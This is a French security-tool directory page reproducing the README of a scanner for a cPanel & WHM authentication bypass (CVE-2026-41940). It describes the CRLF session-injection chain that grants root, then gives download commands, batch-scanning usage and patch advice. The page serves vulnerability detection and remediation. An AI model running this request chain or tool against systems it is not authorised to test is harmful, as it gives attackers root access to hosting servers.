Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cPanel-WHM-CVE-2026-41940-AuthBypass — Scanner pour le contournement d'authentification cPanel & WHM (CVE-2026-41940) qui détecte les versions vulnérables via l'injection CRLF et la manipulation de session, avec prise en charge du multi-threading et des proxys. | Kitploit
Outils/GitHubGitHub/isee857/cpanel-whm-cve-2026-41940-authbypass
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionAuthentificationRed Teaming
GitHubisee857/cpanel-whm-cve-2026-41940-authbypass

cPanel-WHM-CVE-2026-41940-AuthBypass

Scanner pour le contournement d'authentification cPanel & WHM (CVE-2026-41940) qui détecte les versions vulnérables via l'injection CRLF et la manipulation de session, avec prise en charge du multi-threading et des proxys.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner de contournement d'authentification CVE-2026-41940 cPanel & WHM

⚠️ Avertissement légal

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'utilisateur doit se conformer aux lois et réglementations locales ; il est strictement interdit de scanner des systèmes non autorisés. L'auteur décline toute responsabilité en cas d'utilisation abusive.


🔥 Aperçu de la vulnérabilité

ÉlémentDétails
ID CVECVE-2026-41940
Nom de la vulnérabilitéInjection CRLF dans le fichier de session cPanel & WHM
Niveau de gravité🔴 CRITIQUE (CVSS 9.8)
Versions affectéescPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 / 11.132.0.29 / 11.134.0.20 / 11.136.0.5
Type de vulnérabilitéContournement d'authentification → Obtention des privilèges root
Difficulté d'exploitationFaible

Principe de la vulnérabilité

cPanel & WHM présente un défaut logique lors du traitement des fichiers de session :

  1. La fonction saveSession() appelle filter_sessiondata() après l'écriture du fichier de session
  2. Un attaquant peut construire un en-tête Authorization: Basic contenant une injection CRLF
  3. La charge utile malveillante est écrite directement dans le fichier de session sur disque, injectant des champs tels que hasroot=1, tfa_verified=1
  4. Cela permet finalement de contourner l'authentification WHM et d'obtenir un accès de niveau root

✨ Fonctionnalités

✅ Détection précise - Reproduit rigoureusement la chaîne d'exploitation d'origine
✅ Aucune dépendance - Utilise uniquement la bibliothèque standard de Python
✅ Multithread - Prend en charge l'analyse par lots
✅ Support proxy - Compatible avec Burp Suite/Owasp ZAP
✅ Analyse intelligente - Complète automatiquement le protocole et le port
✅ Sortie surlignée - Résultats de vulnérabilité affichés en rouge bien visible

Processus de détection (4 étapes)

root@kitploit:~
[1] POST /login/?login_only=1          → Obtention d'une session de pré-authentification
[2] GET / + injection CRLF             → Corruption du fichier de session
[3] GET /scripts2/listaccts            → Déclenchement du rafraîchissement du cache
[4] GET /cpsess/token/json-api/version → Vérification des privilèges root

🚀 Démarrage rapide

Prérequis

  • Python 3.6+

Téléchargement du script

root@kitploit:~
wget https://github.com/iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass/blob/main/cPanel-WHM-CVE-2026-41940-AuthBypass.py
chmod +x cPanel-WHM-CVE-2026-41940-AuthBypass.py

📖 Mode d'emploi

Détection d'une cible unique

root@kitploit:~
# Complétion automatique de https://
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087

# Spécification d'une URL complète
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u https://example.com:2087

Détection par lots

root@kitploit:~
# Lecture des cibles depuis un fichier
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt -t 20

# Format de targets.txt :
# 1.2.3.4:2087
# example.com:2087
# https://test.com:2087

Détection via proxy (avec Burp Suite)

root@kitploit:~
# Utilisation d'un proxy HTTP
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087 --proxy http://127.0.0.1:8080

# Analyse par lots via proxy
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt --proxy http://127.0.0.1:8080 -t 5

Paramètres courants

ParamètreDescriptionExemple
-u, --urlCible unique-u 1.2.3.4:2087
-f, --fileFichier de liste de cibles-f targets.txt
-t, --threadsNombre de threads (défaut 10)-t 20
--timeoutDélai d'expiration (défaut 10 secondes)--timeout 15
--proxyProxy HTTP/HTTPS--proxy http://127.0.0.1:8080

📊 Exemple de sortie

Vulnérabilité présente (surlignée en rouge)

root@kitploit:~
13:45:01 [SCAN] Testing 1.2.3.4:2087
13:45:02 [INFO] Got session: 9f3a2c1b8d...
13:45:02 [INFO] Got token: /cpsess1234567890
13:45:03 [VULN] CVE-2026-41940 CONFIRMED! 1.2.3.4:2087
ScreenShot_2025-12-19_151413_652

Vulnérabilité absente

root@kitploit:~
13:46:01 [SCAN] Testing 5.6.7.8:2087
13:46:02 [ERR ] Failed to get session 5.6.7.8:2087

🔍 Notes sur la validation de la vulnérabilité

Le script confirme la vulnérabilité selon la logique suivante :

  1. Obtention de la session : Récupération réussie du cookie whostmgrsession
  2. Extraction du jeton : La réponse contient le chemin /cpsess{digit}
  3. Vérification des privilèges : L'accès à /json-api/version renvoie 200 et contient le champ "version"

⚠️ Remarque : Certaines cibles peuvent renvoyer 500/503 et afficher "License", ce qui indique toujours un contournement d'authentification réussi, mais simplement l'absence de licence commerciale.


🛡️ Recommandations de correctif

Mettez à niveau immédiatement vers les versions sécurisées suivantes :

  • 11.110.0.97+
  • 11.118.0.63+
  • 11.126.0.54+
  • 11.132.0.29+
  • 11.134.0.20+
  • 11.136.0.5+

Mesures d'atténuation temporaires :

  1. Restreindre les adresses IP autorisées à accéder au port WHM (2087)
  2. Activer les règles de pare-feu
  3. Surveiller les modifications anormales du répertoire /var/cpanel/sessions/

🙏 Références et remerciements

https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/


⚠️ Rappel important

Cet outil est destiné uniquement aux tests de sécurité autorisés et à la recherche défensive. Toute analyse non autorisée est illégale et engage la responsabilité de son auteur.


Star ⭐ ce projet pour obtenir plus de mises à jour d'outils de sécurité !

Télécharger l’outil